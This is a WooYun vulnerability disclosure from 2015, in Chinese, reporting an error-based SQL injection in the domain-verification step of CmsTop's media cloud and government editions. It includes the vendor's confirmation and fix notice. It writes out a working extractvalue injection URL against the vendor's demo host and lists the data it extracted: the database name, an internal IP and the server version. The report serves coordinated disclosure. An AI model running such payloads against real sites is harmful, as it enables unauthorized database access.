当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142783

漏洞标题:CMSTOP媒体云&政务版SQL报错注入漏洞(XPATH)

相关厂商:CmsTop

漏洞作者: 路人甲

提交时间:2015-09-22 15:03

修复时间:2015-12-23 14:02

公开时间:2015-12-23 14:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向第三方安全合作伙伴开放
2015-11-18: 细节向核心白帽子及相关领域专家公开
2015-11-28: 细节向普通白帽子公开
2015-12-08: 细节向实习白帽子公开
2015-12-23: 细节向公众公开

简要描述:

RT

详细说明:

厂商官网:http://www.cmstop.com/
产品包括:

CmsTop 媒体版
面向媒体提供“PC站+手机站+手机端+平板端”多终端一体化新媒体技术解决方案,助力媒体融合转型。
媒体云
CmsTop 媒体云
作为媒体云时代的开创者,思拓合众颠覆了传统的软件采购和项目外包模式,与传媒集团建立战略合作伙伴关系,以互联网思维和云计算技术为基础整合集团、区域和行业内的媒体及政务新媒体资源,共同建设和运营媒体云。
政务版
CmsTop 政务版
面向党政部门提供多终端一体化的网站群私有云技术解决方案,助力党政部门打造“两微一端”政务新媒体。


注册8.png


在线演示站点:

http://www.cmstop.cn/


SQL漏洞出在校验域名处
第一步、注册
第二步、设置手机号、qq号等信息
第三,四步、设置个性域名
在这一步缺少过滤,造成注入
提交'

注册5.png


继续构造

http://site.cmstop.cn/index/index/verfiysite?identifier=wooyunad' and extractvalue(1, concat(0x5c, (select database())));


注册7.png


注出数据库:

数据库:cloud_data


注出用户:

用户:10.162.64.228


注册6.png


然后是版本等。。。

版本:5.6.16-log
@@version_compile_os:Linux


注册9.png

漏洞证明:

第一步、注册

注册1.png


第二步、邮箱激活后登陆

注册2.png


第三步、设置信息

注册3.png


第四步、设置域名

注册4.png


这里出现注入

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-09-24 14:01

厂商回复:

此漏洞为已知问题,目前已修复,现正在内部测试,测试完成后会更新到线上,感谢关注!

最新状态:

暂无